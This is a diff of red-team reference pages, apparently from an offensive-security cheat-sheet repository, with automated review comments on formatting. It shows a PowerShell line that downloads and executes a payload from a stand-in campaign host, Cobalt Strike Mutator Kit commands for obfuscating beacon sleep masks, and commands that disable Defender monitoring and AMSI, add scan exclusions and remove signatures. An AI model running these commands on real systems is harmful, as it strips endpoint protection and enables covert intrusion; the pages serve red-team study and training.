Windows Defender Antivirus - DefenderCheck
parent
da323c6cd4
commit
59791e0c9f
|
@ -9,6 +9,7 @@ Use the correct collector:
|
||||||
* [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS)
|
* [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS)
|
||||||
* [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
|
* [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
|
||||||
* [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
|
* [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
|
||||||
|
* [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)
|
||||||
|
|
||||||
**Examples**:
|
**Examples**:
|
||||||
|
|
||||||
|
|
|
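Review bot: the new bofhound entry at the end of the collector list breaks the pattern the neighbouring entries follow, where the parenthetical names the collector's language or transport ("C# collector using ADWS", "Rust collector", "Python collector") while this one carries a long description of input sources. Suggest the same shape, e.g. `* [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory (converts ldapsearch BOF, pyldapsearch and Brute Ratel LDAP Sentinel logs into BloodHound-compatible JSON)`, and hyphenate "BloodHound-compatible".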
@ -13,6 +13,7 @@ $ ./cobaltstrike
|
||||||
$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))"
|
$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Infrastructure](#infrastructure)
|
* [Infrastructure](#infrastructure)
|
||||||
|
@ -39,6 +40,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
|
||||||
* [Artifact Kit](#artifact-kit)
|
* [Artifact Kit](#artifact-kit)
|
||||||
* [Mimikatz Kit](#mimikatz-kit)
|
* [Mimikatz Kit](#mimikatz-kit)
|
||||||
* [Sleep Mask Kit](#sleep-mask-kit)
|
* [Sleep Mask Kit](#sleep-mask-kit)
|
||||||
|
* [Mutator Kit](#mutator-kit)
|
||||||
* [Thread Stack Spoofer](#thread-stack-spoofer)
|
* [Thread Stack Spoofer](#thread-stack-spoofer)
|
||||||
* [Beacon Object Files](#beacon-object-files)
|
* [Beacon Object Files](#beacon-object-files)
|
||||||
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
|
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
|
||||||
|
@ -423,24 +425,40 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
|
||||||
- Build the Artifact
|
- Build the Artifact
|
||||||
- Cobalt Strike -> Script Manager > Load .cna
|
- Cobalt Strike -> Script Manager > Load .cna
|
||||||
|
|
||||||
|
|
||||||
### Mimikatz Kit
|
### Mimikatz Kit
|
||||||
|
|
||||||
* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724)
|
* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724)
|
||||||
* Load the mimikatz.cna aggressor script
|
* Load the mimikatz.cna aggressor script
|
||||||
* Use mimikatz functions as normal
|
* Use mimikatz functions as normal
|
||||||
|
|
||||||
|
|
||||||
### Sleep Mask Kit
|
### Sleep Mask Kit
|
||||||
|
|
||||||
> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping.
|
> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping.
|
||||||
|
|
||||||
Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons.
|
Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons.
|
||||||
|
|
||||||
|
|
||||||
|
### Mutator Kit
|
||||||
|
|
||||||
|
> The Mutator Kit, introduced by Cobalt Strike, is a tool designed to create uniquely mutated versions of a "sleep mask" used in payloads to evade detection by static signatures. It utilizes LLVM obfuscation techniques to alter the sleep mask, making it difficult for memory scanning tools to identify the mask based on predefined patterns, thereby enhancing operational security for red team activities.
|
||||||
|
|
||||||
|
The OBFUSCATIONS variable can be `flattening`,`substitution`,`split-basic-blocks`,`bogus`.
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
OBFUSCATIONS=substitution mutator.sh x64 -emit-llvm -S example.c -o example_with_substitutions.ll
|
||||||
|
mutator.sh x64 -c -DIMPL_CHKSTK_MS=1 -DMASK_TEXT_SECTION=1 -o sleepmask.x64.o src49/sleepmask.c
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Thread Stack Spoofer
|
### Thread Stack Spoofer
|
||||||
|
|
||||||
> An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory.
|
> An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory.
|
||||||
|
|
||||||
Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`.
|
Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`.
|
||||||
|
|
||||||
|
|
||||||
## Beacon Object Files
|
## Beacon Object Files
|
||||||
|
|
||||||
> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs
|
> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs
|
||||||
|
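Review bot: the fenced block holding the two `mutator.sh` invocations is tagged `ps1`, but `OBFUSCATIONS=substitution mutator.sh x64 -emit-llvm -S example.c -o example_with_substitutions.ll` is POSIX shell syntax (an environment variable assignment prefixed to the command), which PowerShell does not accept; tag the fence `bash` or `sh`, and show a separate invocation if a Windows build is also intended. Smaller points in the same section: the sentence "The OBFUSCATIONS variable can be `flattening`,`substitution`,`split-basic-blocks`,`bogus`." needs spaces after the commas and should say whether several values can be combined; the path `src49/sleepmask.c` in the second command is not explained anywhere in the section, so a short clause saying where that directory comes from (presumably the sleep mask source described in the Sleep Mask Kit paragraph above) would help readers arriving from the Summary; and it is worth stating that the first command only emits LLVM IR (`-emit-llvm -S` to a `.ll` file) so the obfuscation can be inspected, while the second produces the `sleepmask.x64.o` object the kit actually consumes.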
@ -489,3 +507,4 @@ beacon> PortBender redirect 445 8445
|
||||||
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
|
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
|
||||||
* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
|
* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
|
||||||
* [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf)
|
* [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf)
|
||||||
|
* [Introducing the Mutator Kit: Creating Object File Monstrosities with Sleep Mask and LLVM - @joehowwolf @HenriNurmi](https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm)
|
|
@ -321,29 +321,45 @@ Add-MpPreference -AttackSurfaceReductionRules_Ids <Id> -AttackSurfaceReductionRu
|
||||||
|
|
||||||
Also known as `Microsoft Defender`.
|
Also known as `Microsoft Defender`.
|
||||||
|
|
||||||
```powershell
|
* Check status of Defender
|
||||||
# check status of Defender
|
```powershell
|
||||||
PS C:\> Get-MpComputerStatus
|
PS C:\> Get-MpComputerStatus
|
||||||
|
```
|
||||||
|
|
||||||
# disable scanning all downloaded files and attachments, disable AMSI (reactive)
|
* Disable scanning all downloaded files and attachments
|
||||||
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
```powershell
|
||||||
PS C:\> Set-MpPreference -DisableIOAVProtection $true
|
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||||
|
PS C:\> Set-MpPreference -DisableIOAVProtection $true
|
||||||
|
```
|
||||||
|
|
||||||
# disable AMSI (set to 0 to enable)
|
* Disable AMSI (set to 0 to enable)
|
||||||
PS C:\> Set-MpPreference -DisableScriptScanning 1
|
```powershell
|
||||||
|
PS C:\> Set-MpPreference -DisableScriptScanning 1
|
||||||
|
```
|
||||||
|
|
||||||
# exclude a folder
|
* Exclude a folder, a process from scanning
|
||||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
|
```powershell
|
||||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
|
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
|
||||||
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
|
||||||
|
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
||||||
|
```
|
||||||
|
|
||||||
# exclude using wmi
|
* Exclude a folder using WMI
|
||||||
PS C:\> WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public\wmic"
|
```powershell
|
||||||
|
PS C:\> WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public\wmic"
|
||||||
|
```
|
||||||
|
|
||||||
|
* Remove signatures. **NOTE**: if Internet connection is present, they will be downloaded again.
|
||||||
|
```powershell
|
||||||
|
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
|
||||||
|
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
||||||
|
```
|
||||||
|
|
||||||
|
Identify the exact bytes that are detected by Windows Defender Antivirus
|
||||||
|
|
||||||
|
* [matterpreter/DefenderCheck](https://github.com/matterpreter/DefenderCheck) - Identifies the bytes that Microsoft Defender flags on
|
||||||
|
* [gatariee/gocheck](https://github.com/gatariee/gocheck) - DefenderCheck but blazingly fast™
|
||||||
|
|
||||||
# remove signatures (if Internet connection is present, they will be downloaded again):
|
|
||||||
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
|
|
||||||
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## Windows Defender Application Control
|
## Windows Defender Application Control
|
||||||
|
|
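Review bot: under the new "Exclude a folder, a process from scanning" bullet the path exclusions use `Add-MpPreference` but the process exclusion uses `Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"`; `Set-MpPreference` replaces the entire exclusion list whereas `Add-MpPreference` appends to it, so the two lines do not behave the same way and the process line should read `Add-MpPreference -ExclusionProcess ...` to match the bullet's wording. Three smaller points: the bullet "Disable scanning all downloaded files and attachments" is followed by a block whose first command is `Set-MpPreference -DisableRealtimeMonitoring $true`, which turns off real-time protection rather than download/attachment scanning (that is the `-DisableIOAVProtection` line below it), so the bullet text should cover both, as the removed comment "disable scanning all downloaded files and attachments, disable AMSI (reactive)" did; `-DisableScriptScanning 1` should use `$true` like the other boolean switches in the section, and the label "Disable AMSI" is broader than what the parameter name says; and the line "Identify the exact bytes that are detected by Windows Defender Antivirus" that introduces DefenderCheck and gocheck is plain text between bulleted sections, so giving it the same `* ` or bold lead-in style used elsewhere in the file (e.g. `**Examples**:`) would keep the structure consistent. Finally, the `MpCmdRun.exe` path under `Platform\4.18.2008.9-0\` is version-specific and will differ from host to host; the block already shows the `C:\Program Files\Windows Defender\` alternative, so a one-line note that the Platform folder name changes with the engine version would prevent copy-paste failures.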